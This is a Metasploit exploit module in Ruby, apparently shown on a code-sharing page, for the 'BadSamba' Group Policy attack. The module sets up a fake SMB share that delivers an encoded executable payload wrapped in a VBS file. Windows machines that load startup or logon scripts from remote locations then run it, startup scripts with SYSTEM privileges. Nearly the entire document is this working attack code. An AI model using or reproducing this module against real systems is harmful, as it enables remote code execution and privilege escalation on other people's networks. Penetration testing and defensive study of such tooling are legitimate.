Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ManualRanking
8

9
  include Msf::Exploit::Remote::SMB::Server::Share
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'          => 'Group Policy Script Execution From Shared Resource',
14
      'Description'   => %q{
15
        This is a general-purpose module for exploiting systems with Windows Group Policy
16
        configured to load VBS startup/logon scripts from remote locations. This module runs
17
        a SMB shared resource that will provide a payload through a VBS file. Startup scripts
18
        will be executed with SYSTEM privileges, while logon scripts will be executed with the
19
        user privileges. Have into account which the attacker still needs to redirect the
20
        target traffic to the fake SMB share to exploit it successfully. Please note in some
21
        cases, it will take 5 to 10 minutes to receive a session.
22
      },
23
      'Author'      =>
24
        [
25
          'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba
26
          'juan vazquez' # msf module
27
        ],
28
      'References'     =>
29
        [
30
          ['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],
31
          ['URL', 'https://github.com/GDSSecurity/BadSamba']
32
        ],
33
      'DefaultOptions' =>
34
        {
35
          'EXITFUNC' => 'thread',
36
        },
37
      'Privileged'     => false,
38
      'Platform'       => 'win',
39
      'Arch'           => [ARCH_X86, ARCH_X64],
40
      'Payload'        =>
41
        {
42
          'Space'       => 2048,
43
          'DisableNops' => true
44
        },
45
      'Targets'        =>
46
        [
47
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
48
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
49
        ],
50
      'DefaultTarget'  => 0,
51
      'DisclosureDate' => '2015-01-26',
52
      'Notes' =>
53
          {
54
              'AKA' => ['badsamba']
55
          }
56
    ))
57

58
    register_options(
59
      [
60
        OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])
61
      ])
62

63
    deregister_options('FILE_CONTENTS')
64
  end
65

66
  def setup
67
    super
68
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
69
    @custom_payloads = {}
70
    print_status("File available on #{unc}...")
71
  end
72

73
  def on_client_connect(client)
74
    super(client)
75

76
    unless @custom_payloads[:client]
77
      p = regenerate_payload(client)
78
      exe = p.encoded_exe
79
      @custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(exe)
80
    end
81
  end
82

83
  def get_file_contents(client:)
84
    contents = @custom_payloads[client] || super(client: client)
85

86
    contents
87
  end
88
end
89

90